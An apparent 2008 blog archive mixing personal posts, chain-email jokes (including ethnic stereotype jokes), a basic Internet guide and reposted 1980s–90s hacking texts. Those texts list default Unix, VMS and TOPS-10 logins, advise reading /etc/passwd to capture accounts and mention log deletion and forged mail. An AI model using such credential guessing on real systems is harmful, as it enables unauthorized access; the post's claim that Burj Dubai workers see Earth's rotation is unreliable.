Saturday, May 31, 2008

healthcliff

not feeling well

i am not feeling well from yesterday. yesterday night i vomited a lot and i slept . i know that today i will not feel well. till now i am not feeling well.
let us see what is happening.

Friday, May 30, 2008

When Fuel price goes up

Hi
i got one video when the fuel price goes up.
please look into it.

Men can do anything

Enough of Sardar jokes……………..Mallu jokes are here!!!!!!!! !!

1) What is the tax on a Mallu's income called?
IngumDax
2) Where did the Malayali study?
In the ko-liage.
3) Why did the Malayali not go to ko-liage today?
He is very bissi.
4) Why did the Malayali buy an air-ticket?
To go to Thuubai, zimbly to meet his ungle in Gelff.
5) Why do Malayalis go to the Gelff?
To yearn meney.
6) What did the Malayali do when the plane caught fire?
He zimbly jembd out of the vindow.
7) How does a Malayali spell moon?
MOON - Yem Woh yet another Woh and Yen
8) What is Malayali management graduate called?
Yem Bee Yae.
9) What does a Malayali do when he goes to America?
He changes his name from Karunakaran to Kevin Curren.
10) What does a Malayali use to commute to office everyday?
An Oto
11) Where does he pray?
In a Temble, Charch and a Maask
12) Who is Bruce Lee's best friend ?
A Malaya-Lee of coarse.
13) Name the only part of the werld, where Malayalis dont werk hard?
Kerala.
14) Why is industrial productivity so low in Kerala?
Because 86% of the shift time is spent on lifting, folding and re-tying the lungi
15) Why did Saddam Hussain attackKuwait?
He had a Mallu baby-sitter, who always used to say 'KEEP QUWAIT' 'KEEP QUWAIT'
16) What is the Latest Malayali Punch Line?
" Frem Tea Shops To Koll Cenders , We Are Yevery Where "
17) Why aren't Mals included in hockey and football teams ?
Coz Whenever they get a corner , they set up a tea shop.
18) Now pass it on to 5 Mals to get a free sample of kokanet oil.
19) Pass it on 10 Mals to get a free pack of Benana Chibbs.
20) Pass it on to 15 Mals to get a set of BROGUN bones....

car drive in iraq

Car Driving in iraq
watch it.

let see

i dont know where my path is going on? GuruDheva only should define me. whether my time is wrong or i have done myself wrong i dont know He should only decide that one.let wait and see...

Thursday, May 29, 2008

Engineer


Engineer

amazing video

A store that sells husbands has just opened

A store that sells husbands has just opened in New York City, where a woman may go to choose a husband. Among the instructions at the entrance is a description of how the store operates. You may visit the store ONLY ONCE!There are six floors and the attributes of the men increase as the shopper ascends the flights.

There is, however, a catch. ... You may choose any man from a particular floor, or you may choose to go up a floor, but you cannot go back down except to exit the building!


So, a woman goes to the Husband Store to find a husband. .On the first floor the sign on the door

reads:Floor 1 - These men have jobs and love the Lord.*********The second floor sign

reads:Floor 2 - These men have jobs, love the Lord, and love kids. *********The third floor sign

reads:Floor 3 - These men have jobs, love the Lord, love kids, and are extremely good

looking."Wow," she thinks, but feels compelled to keep going.*********She goes to the fourth

floor and sign reads: Floor 4 - These men have jobs, love the Lord, love kids, are drop- dead good looking and help with the housework."Oh, mercy me!" she exclaims, "I can hardly stand it!"*********Still, she goes to the fifth floor and sign reads:

Floor 5 - These men have jobs, love the Lord, love kids, are drop- dead gorgeous, help with the housework, and have a strong romantic streak.She is so tempted to stay, but she goes to the

sixth floor and the sign reads:*********Floor 6 - You are visitor 4,363,012 to this floor. There are no men on this floor. This floor exists solely as proof that women are impossible to please.Thank you for shopping at the Husband Store. Watch your step as you exit the building, and have a nice day!

Hold the Breath...




Hold the Breath...




Now see this stuff………………….This is taken from world's tallest building "Burj Dubai" @ 2,620 ft / 801m!!!



Really amazingLook at the edge (uppermost right corner) of the picture, you can almost see the turn of the earth





The persons who are working on the upper most Girders can see the "ROTATION OF EARTH"
So terrifying…..







A Basic Guide to the Internet

A Basic Guide to the Internet
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.


--------------------------------------------------------------------------------

COMPONENTS OF THE INTERNET

--------------------------------------------------------------------------------

WORLD WIDE WEB
The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.

The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.

The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.

Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.

The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.

The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.

For more complete information about the World Wide Web, see Understanding The World Wide Web.

E-MAIL
Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.

A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.

TELNET
Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers (140.147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.

Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.

With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.

FTP
FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.

If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.

FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.

E-MAIL DISCUSSION GROUPS
One of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.

A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e-mail account to participate in a listserv discussion group. Visit Tile.net at /http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.

Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.

USENET NEWS
Usenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e-mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.

Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.

There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer-related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.

The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.

FAQ, RFC, FYI
FAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at /http://www.faqs.org/.

RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet. They contain both technical specifications and general information.

FYI stands for For Your Information. These notes are a subset of RFCs and contain information of interest to new Internet users.

Links to indexes of all three of these information resources are available on the University Libraries Web site at /http://library.albany.edu/reference/faqs.html.

CHAT & INSTANT MESSENGING
Chat programs allow users on the Internet to communicate with each other by typing in real time. They are sometimes included as a feature of a Web site, where users can log into the "chat room" to exchange comments and information about the topics addressed on the site. Chat may take other, more wide-ranging forms. For example, America Online is well known for sponsoring a number of topical chat rooms.

Internet Relay Chat (IRC) is a service through which participants can communicate to each other on hundreds of channels. These channels are usually based on specific topics. While many topics are frivolous, substantive conversations are also taking place. To access IRC, you must use an IRC software program.

A variation of chat is the phenomenon of instant messenging. With instant messenging, a user on the Web can contact another user currently logged in and type a conversation. Most famous is America Online's Instant Messenger. ICQ, MSN and Yahoo are other commonly-used chat programs.

Other types of real-time communication are addressed in the tutorial Understanding the World Wide Web.

MUD/MUSH/MOO/MUCK/DUM/MUSE
MUD stands for Multi User Dimension. MUDs, and their variations listed above, are multi-user virtual reality games based on simulated worlds. Traditionally text based, graphical MUDs now exist. There are MUDs of all kinds on the Internet, and many can be joined free of charge. For more information, read one of the FAQs devoted to MUDs available at the FAQ site at

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

A BEGINNERS GUIDE TO: H A C K I N G

************************************** * A BEGINNERS GUIDE TO: * * H A C K I N G * * * * U N I X * * * * BY JESTER SLUGGO * * (NOTE: THIS IS WRITTEN IN 40 COL.) * * WRITTEN 10/08/85 * ************************************** IN THE FOLLOWING FILE, ALL REFERENCES MADE TO THE NAME UNIX, MAY ALSO BE SUBSTITUTED TO THE XENIX OPERATING SYSTEM. BRIEF HISTORY: BACK IN THE EARLY SIXTIES, DURING THE DEVELOPMENT OF THIRD GENERATION COMPUTERS AT MIT, A GROUP OF PROGRAMMERS STUDYING THE POTENTIAL OF COMPUTERS, DISCOVERED THEIR ABILITY OF PERFORMING TWO OR MORE TASKS SIMULTANEOUSLY. BELL LABS, TAKING NOTICE OF THIS DISCOVERY, PROVIDED FUNDS FOR THEIR DEVELOPMENTAL SCIENTISTS TO INVESTIGATE INTO THIS NEW FRONTIER. AFTER ABOUT 2 YEARS OF DEVELOPMENTAL RESEARCH, THEY PRODUCED AN OPERATING SYSTEM THEY CANLMD "UNIX". SIXTIES TO CURRENT: DURING THIS TIME BELL SYSTEMS INSTALLED THE UNIX SYSTEM TO PROVIDE THEIR COMPUTER OPERATORS WITH THE ABILITY TO MULTITASK SO THAT THEY COULD BECOME MORE PRODUCTIVE, AND EFFICIENT. ONE OF THE SYSTEMS THEY PUT ON THE UNIX SYSTEM WAS CALLED "ELMOS". THROUGH ELMOS MANY TASKS (I.E. BILLING,AND INSTALLATION RECORDS) COULD BE DONE BY MANY PEOPLE USING THE SAME MAINFRAME. NOTE: COSMOS IS ACCESSED THROUGH THE ELMOS SYSTEM. CURRENT: TODAY, WITH THE DEVELOPMENT OF MICRO COMPUTERS, SUCH MULTITASKING CAN BE ACHIEVED BY A SCALED DOWN VERSION OF UNIX (BUT JUST AS POWERFUL). MICROSOFT,SEEING THIS DEVELOPMENT, OPTED TO DEVELOP THEIR OWN UNIX LIKE SYSTEM FOR THE IBM LINE OF PC/XT'S. THEIR RESULT THEY CALLED XENIX (PRONOUNCED ZEE-NICKS). BOTH UNIX AND XENIX CAN BE EASILY INSTALLED
ON IBM PC'S AND OFFER THE SAME FUNCTION
(JUST 2 DIFFERENT VENDORS).

NOTE: DUE TO THE MANY DIFFERENT
VERSIONS OF UNIX (BERKLEY UNIX,
BELL SYSTEM III, AND SYSTEM V
THE MOST POPULAR) MANY COMMANDS
FOLLOWING MAY/MAY NOT WORK. I HAVE
WRITTEN THEM IN SYSTEM V ROUTINES.
UNIX/XENIX OPERATING SYSTEMS WILL
BE CONSIDERED IDENTICAL SYSTEMS BELOW.

HOW TO TELL IF/IF NOT YOU ARE ON A
UNIX SYSTEM: UNIX SYSTEMS ARE QUITE
COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;)
PASSWORD:

WHEN HACKING ON A UNIX SYSTEM IT IS
BEST TO USE LOWERCASE BECAUSE THE UNIX
SYSTEM COMMANDS ARE ALL DONE IN LOWER-
CASE.
LOGIN; IS A 1-8 CHARACTER FIELD. IT IS
USUALLY THE NAME (I.E. JOE OR FRED)
OF THE USER, OR INITIALS (I.E. J.JONES
OR F.WILSON). HINTS FOR LOGIN NAMES
CAN BE FOUND TRASHING THE LOCATION OF
THE DIAL-UP (USE YOUR CN/A TO FIND
WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD
ASSIGNED BY THE SYSOP OR CHOSEN BY THE
USER.
COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
DAEMON DAEMON
UUCP UUCP
TTY TTY
TEST TEST
UNIX UNIX
BIN BIN
ADM ADM
WHO WHO
LEARN LEARN
UUHOST UUHOST
NUUCP NUUCP

IF YOU GUESS A LGIN NAME AND YOU ARE
NOT ASKED FOR A PASSWORD, AND HAVE
ACCESSED TO THE SYSTEM, THEN YOU HAVE
WHAT IS KNOWN AS A NON-GIFTED ACCOUNT.
IF YOU GUESS A CORRECT LOGIN AND PASS-
WORD, THEN YOU HAVE A USER ACCOUNT.
AND, IF YOU GUESS THE ROOT PASSWORD,
THEN YOU HAVE A "SUPER-USER" ACCOUNT.
ALL UNIX SYSTEMS HAVE THE FOLLOWING
INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:

$
%
#

BUT CAN BE JUST ABOUT ANYTHING THE
SYSOP OR USER WANTS IT TO BE.

THINGS TO DO WHEN YOU ARE IN: SOME
OF THE COMMANDS THAT YOU MAY WANT TO
TRY FOLLOW BELOW:

WHO IS ON (SHOWS WHO IS CURRENTLY
LOGGED ON THE SYSTEM.)
WRITE NAME (NAME IS THE PERSON YOU
WISH TO CHAT WITH)
TO EXIT CHAT MODE TRY CTRL-D.
EOT=END OF TRANSFER.
LS -A (LIST ALL FILES IN CURRENT
DIRECTORY.)
DU -A (CHECKS AMOUNT OF MEMORY
YOUR FILES USE;DISK USAGE)
CD\NAME (NAME IS THE NAME OF THE
SUB-DIRECTORY YOU CHOOSE)
CD\ (BRINGS YOUR HOME DIRECTORY
TO CURRENT USE)
CAT NAME (NAME IS A FILENAME EITHER
A PROGRAM OR DOCUMENTATION
YOUR USERNAME HAS WRITTEN)
MOST UNIX PROGRAMS ARE WRITTEN
IN THE C LANGUAGE OR PASCAL
SINCE UNIX IS A PROGRAMMERS'
ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE
SYSTEM IS PRINT UP OR CAPTURE (IN A
BUFFER) THE FILE CONTAINING ALL USER
NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:

CAT /ETC/PASSWD

IF YOU ARE SUCCESSFUL YOU WILL A LIST
OF ALL ACCOUNTS ON THE SYSTEM. IT
SHOULD LOOK LIKE THIS:

ROOT:HVNSDCF:0:0:ROOT DIR:/:
JOE:MAJDNFD:1:1:JOE COOL:/BIN:/BIN/JOE
HAL::1:2:HAL SMITH:/BIN:/BIN/HAL

THE "ROOT" LINE TELLS THE FOLLOWING
INFO :
LOGIN NAME=ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY

IN THE JOE LOGIN, THE LAST PART
"/BIN/JOE " TELLS US WHICH DIRECTORY
IS HIS HOME DIRECTORY (JOE) IS.

IN THE "HAL" EXAMPLE THE LOGIN NAME IS
FOLLOWED BY 2 COLONS, THAT MEANS THAT
THERE IS NO PASSWORD NEEDED TO GET IN
USING HIS NAME.

CONCLUSION: I HOPE THAT THIS FILE
WILL HELP OTHER NOVICE UNIX HACKERS
OBTAIN ACCESS TO THE UNIX/XENIX
SYSTEMS THAT THEY MAY FIND. THERE IS
STILL WIDE GROWTH IN THE FUTURE OF
UNIX, SO I HOPE USERS WILL NOT ABUSE
ANY SYSTEMS (UNIX OR ANY OTHERS) THAT
THEY MAY HAPPEN ACROSS ON THEIR
JOURNEY ACROSS THE ELECTRONIC HIGHWAYS OF AMERICA. THERE IS MUCH MORE TO BE LEARNED ABOUT THE UNIX SYSTEM THAT I HAVE NOT COVERED. THEY MAY BE FOUND BY BUYING A BOOK ON THE UNIX SYSTEM (HOW I LEARNED) OR IN THE FUTURE I MAY WRITE A PART II TO THIS........ Downloaded from P-80 Systems......

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

A Guide to Internet Security: Becoming an Uebercracker

A Guide to Internet Security: Becoming an Uebercracker
and Becoming an UeberAdmin to stop Uebercrackers.


Author: Christopher Klaus
Date: December 5th, 1993.
Version: 1.1

This is a paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.

Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and
connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it. If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be
obnoxious on #hack otherwise people will look down on you and not give you
anything.)

Step 11. Hopefully you will now have atleast one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
temps you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confinscate your equipment. Call eff.org to complain how you were innocent
and how you accidently gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted. YOU are finally a
true Uebercracker.


Now the next part of the paper is top secret. Please only pass to trusted
administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a
security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers
now. Rdist scripts is among the favorites for getting root by
uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines. Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrads! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
to his mail via NFS exports or the guest account. You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.)

Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet. They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.

Step 10. If you have gained the confidence of enough security experts,
you will know be a looked upto as an elite security administrator that is
able to stop most uebercrackers. The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix." and the other half of the replies will be like - "Wow. That is very
impressive. You have just moved up a big notch in my security circle."
VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.


Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin. Three points I would like to make that would
probably clean up most of the security problems on Internet are as the
following:

1. Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet. (I believe Uebercracker is german for "lame copy-cat
that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null. Maybe with enough mail, it will overfill
/dev/null. (Look in manual if confused.)

2. Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches. Most
security experts probably don't realize how far their information has
already spread.

3. And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.


Resources for Security:
Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs. For more information
about ISS (Internet Security Scanner), email cklaus@shadow.net.


Acknowledgements:

Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.


Copyright:

This paper is Copyright 1993, 1994. Please distribute to only trusted
people. If you modify, alter, disassemble, reassemble, re-engineer or have
any suggestions or comments, please send them to:

cklaus@shadow.net

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

A Novices Guide To Hacking

A Novices Guide To Hacking
This file is an addendum to "A Novice's Guide To Hacking" written by "The
Mentor". The word "hacking" is here used the way the non-hacking public
thinks it is used, to mean breaking into somebody else's computer. Its
purpose is to expand and clarify the information about the TOPS-20 operating
system, which runs on DECsystem-20 mainframes. The Mentor basically lumped
this system in with TOPS-10 and didn't note important differences between the
two. I will here reproduce in full what The Mentor had to say about TOPS-10
and about VMS, which are the parent and the offspring of TOPS-20.

VMS- The VAX computer is made by Digital Equipment Corporation (DEC),
and runs the VMS (Virtual Memory System) operating system.
VMS is characterized by the 'Username:' prompt. It will not tell
you if you've entered a valid username or not, and will disconnect
you after three bad login attempts. It also keeps track of all
failed login attempts and informs the owner of the account next time
s/he logs in how many bad login attempts were made on the account.
It is one of the most secure operating systems around from the
outside, but once you're in there are many things that you can do
to circumvent system security. The VAX also has the best set of
help files in the world. Just type HELP and read to your heart's
content.
Common Accounts/Defaults: [username: password [[,password]] ]
SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB
OPERATOR: OPERATOR
SYSTEST: UETP
SYSMAINT: SYSMAINT or SERVICE or DIGITAL
FIELD: FIELD or SERVICE
GUEST: GUEST or unpassworded
DEMO: DEMO or unpassworded
DECNET: DECNET


DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you seen an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

**** note: I'm remembering this stuff from several years ago, and in some
cases my memory may be foggy or stuff may be outdated.

TOPS-20, once you are inside, resembles VMS much more than it resembles
TOPS-10, as far as I know (I'm not really familiar with VMS). From the
outside, it's more like TOPS-10, except that the prompt is a @ instead of a
period. You can enter many commands without logging in, including SYSTAT and
probably FINGER. (Sometimes you can even use the mail program without
logging in.) It is very helpful. Not only does the command HELP lead to
lots of useful information, but anywhere in typing a command you can press ?
and it will tell you what the format of the command expects. For instance,
if you type ? by itself, it will tell you all the words that a command can
begin with. If you type S?, it will tell you all the commands that start
with the letter S. If you type SYSTAT ?, it will tell you the options
available on the systat command. You can use this at any point in any
command. Furthermore, if there is only one possibility (you have typed a
unique abbreviation), you can press Escape and it will finish the word for
you. I'm not sure, but I think TOPS-20 was the system that first introduced
filename completion as well --turning a uniquely abbreviated filename into a
complete name when you press escape, beeping if the abbreviation is not
unique. With command keywords you can leave the abbreviation un-expanded,
with filenames you have to expand it (or type it all in) for it to work.

Use the "Login" command to log in, followed by a username. It will prompt
for a password. Note that a password can be something like 39 characters
long, as can the username itself. TOPS-20 does NOT use numbers like 317,043
for user IDs. (Note that these numbers in TOPS-10 are octal, not decimal.)
Furthermore, the password can contain spaces. So, if somebody wants to make
his password difficult to guess, he can easily do so.

